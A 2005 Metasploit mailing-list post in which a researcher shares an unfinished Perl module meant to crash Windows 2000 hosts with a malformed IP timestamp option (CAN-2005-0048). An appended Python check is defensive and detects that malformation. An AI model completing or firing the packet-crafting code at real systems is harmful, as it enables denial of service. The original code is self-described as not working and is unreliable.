
Metasploit mailing list archives
Need Help with Exploit
From: mjreilly at wam.umd.edu (Michael James Reilly)
Date: Sat, 16 Jul 2005 14:40:11 -0400 (EDT)
Hello, I'm currently working over at the University of Maryland trying to develop an exploit for the IP Validation Vulnerability in Windows 2000 Server SP0 (CAN-2005-0048). Unfortunately, this vulnerability requires manipulating the header of an IP packet, and since we don't have much experience with the Metasploit libraries, we're having some trouble getting this exploit off the ground. It seems to me that someone with more experience could probably figure this one out in about a half hour! Can anyone help us figure out how to get this exploit working? C and Perl PoCs are available at http://www.securityfocus.com/bid/13116/exploit.

The trick to getting this exploit to work (in theory) is using an IP option with option size set to 39, but with 40 bytes included with the option (1 byte for the option code, 1 byte for the option size, and 38 bytes for the option data). Here's what we've been trying to work out:

### BEGIN SNIP ###
sub Exploit {
    # Standard beginning stuff
    my $self = shift;
    my $targethost = $self->GetVar('RHOST');
    my $targetport = $self->GetVar('RPORT');
    my $sourcehost = $self->GetVar('LHOST');
    my $sourceport = $self->GetVar('LPORT');

    # For this exploit we can't just blindly use the Msf::Socket::Tcp class
    # Instead, we either need to figure out how to change the IP packet header
    # in an instance of the class, OR we'll have to use the Metasploit class
    # as a basis (NOT a base class, necessarily) for a small class that gives
    # us control of the IP header. The code below is dedicated to making our
    # packet. Any payload code should be handled first above these lines, if
    # we end up using a payload. The packet below should crash the target
    # computer, according to the security reports on this vuln.

    my $rpkt = NetPacket::IP->decode();
    $rpkt->{ver}     = 4;
    $rpkt->{hlen}    = 15;  # 15 words = 60 bytes = 20 bytes for regular header info
                            #   + 1 byte for option
                            #   + 1 byte for option size (set to 39 instead of 40)
                            #   + 38 bytes of junk data
    $rpkt->{id}      = rand();
    $rpkt->{proto}   = 6;
    $rpkt->{ttl}     = 64;
    $rpkt->{src_ip}  = $sourcehost;
    $rpkt->{dest_ip} = $targethost;
    $rpkt->{tos}     = 0;
    $rpkt->{len}     = 80;
    $rpkt->{options} = "";
    $rpkt->{foffset} = 0;
    $rpkt->{flags}   = 0;

    my $tpkt = NetPacket::TCP->decode();
    $tpkt->{src_port}  = 0;
    $tpkt->{dest_port} = 0;
    $tpkt->{seqnum}    = 0;
    $tpkt->{acknum}    = 0;
    $tpkt->{flags}     = 0;
    $tpkt->{winsize}   = 512;
    $tpkt->{cksum}     = 0;
    $tpkt->{urg}       = 0;
    $tpkt->{options}   = "";
    $tpkt->{hlen}      = 5;
    $tpkt->{reserved}  = 0;
    $tpkt->{data}      = "";

    # specially crafted encode functionality:
    my ($hdr, $packet, $zero, $tmp, $offset);
    my ($src_ip, $dest_ip);

    # create a zero variable
    $zero = 0;

    # adjust the length of the packet
    $rpkt->{len} = ($rpkt->{hlen} * 4) + length($rpkt->{data});

    $tmp = $rpkt->{hlen} & 0x0f;
    $tmp = $tmp | (($rpkt->{ver} << 4) & 0xf0);

    $offset = $rpkt->{flags} << 13;
    $offset = $offset | (($rpkt->{foffset} >> 3) & 0x1fff);

    # convert the src and dst ip
    $src_ip  = gethostbyname($rpkt->{src_ip});
    $dest_ip = gethostbyname($rpkt->{dest_ip});

    # Build option bytes (40 bytes)
    my $option        = "68";      # timestamp option (http://www.freesoft.org/CIE/Course/Section3/7.htm) (byte 1)
    my $optionlen     = "39";      # "length" (byte 2)
    my $optionpadding = "E" x 38;  # bytes 3 - 40

    # construct header to calculate the checksum
    $hdr = pack('CCnnnCCna4a4CCC38',
        $tmp, $rpkt->{tos}, $rpkt->{len}, $rpkt->{id}, $offset,
        $rpkt->{ttl}, $rpkt->{proto}, $zero, $src_ip, $dest_ip,
        $option, $optionlen, $optionpadding);
    $rpkt->{cksum} = NetPacket::htons(NetPacket::in_cksum($hdr));

    $rpkt->{data} = $tpkt->encode($rpkt);

    # make the entire packet
    $packet = pack('CCnnnCCna4a4CCC38a*',
        $tmp, $rpkt->{tos}, $rpkt->{len}, $rpkt->{id}, $rpkt->{foffset},
        $rpkt->{ttl}, $rpkt->{proto}, $rpkt->{cksum}, $src_ip, $dest_ip,
        $option, $optionlen, $optionpadding, $rpkt->{data});

    my $s = Msf::Socket::Tcp->new(
        'PeerAddr' => $targethost,
        'PeerPort' => $targetport,
    );
    if ($s->IsError) {
        $self->PrintLine("[*] Socket Error: " . $s->GetError());
        return;
    }

    $s->Send($packet);
    $self->Handler($s);
    return;
}
### END SNIP ###

Thanks for any help you can offer,

- Michael Reilly
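A defender-side check for the malformation the post describes, added here as an example that is not part of the original post or of Metasploit: it walks the IPv4 options area per RFC 791 and reports an option whose declared length does not account for the bytes actually present (the post's layout: type 68, length 39, 40 bytes on the wire). The function names, the sample addresses and both sample headers are constructed for this illustration.

```python
import struct

IPOPT_EOL, IPOPT_NOP, IPOPT_TIMESTAMP = 0, 1, 68

def parse_ipv4_options(header: bytes):
    """Return (options, problems): cleanly parsed (type, length, data) tuples and
    descriptions of length inconsistencies such as the post's (length 39, 40 bytes)."""
    if len(header) < 20:
        return [], ["header shorter than the 20-byte fixed part"]
    ihl = header[0] & 0x0F
    if ihl < 5 or len(header) < ihl * 4:
        return [], [f"IHL {ihl} does not fit the {len(header)} bytes captured"]
    opts = header[20:ihl * 4]
    options, problems = [], []
    i = 0
    while i < len(opts):
        t = opts[i]
        if t == IPOPT_EOL:
            break                       # end of option list; rest is padding
        if t == IPOPT_NOP:
            i += 1                      # single-byte option, no length field
            continue
        if i + 1 >= len(opts):
            problems.append(f"option type {t} at offset {i} has no length byte")
            break
        ln = opts[i + 1]
        if ln < 2 or i + ln > len(opts):
            problems.append(f"option type {t} at offset {i} declares length {ln} "
                            f"with {len(opts) - i} bytes remaining")
            break
        options.append((t, ln, opts[i + 2:i + ln]))
        i += ln
    return options, problems

def build_header(options: bytes, src=b"\x0a\x00\x00\x01", dst=b"\x0a\x00\x00\x02") -> bytes:
    """Constructed IPv4 header (checksum left 0) carrying the given options area."""
    if len(options) % 4 or len(options) > 40:
        raise ValueError("options area must be a multiple of 4 bytes, at most 40")
    ihl = 5 + len(options) // 4
    fixed = struct.pack("!BBHHHBBH4s4s", (4 << 4) | ihl, 0, 20 + len(options),
                        0, 0, 64, 6, 0, src, dst)
    return fixed + options

# Constructed samples: the post's layout (type 68, length 39, 38 bytes of 'E')
# versus a timestamp option whose length covers the whole 40-byte area.
CRAFTED = build_header(bytes([IPOPT_TIMESTAMP, 39]) + b"E" * 38)
WELL_FORMED = build_header(bytes([IPOPT_TIMESTAMP, 40, 5, 0]) + b"\x00" * 36)
```

On the crafted header the leftover 40th byte ('E', 0x45) is read as an option type with no length byte, which is the inconsistency a hardened parser or an IDS rule would reject.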
Current thread:
- Need Help with Exploit Michael James Reilly (Jul 16)
- Need Help with Exploit H D Moore (Jul 18)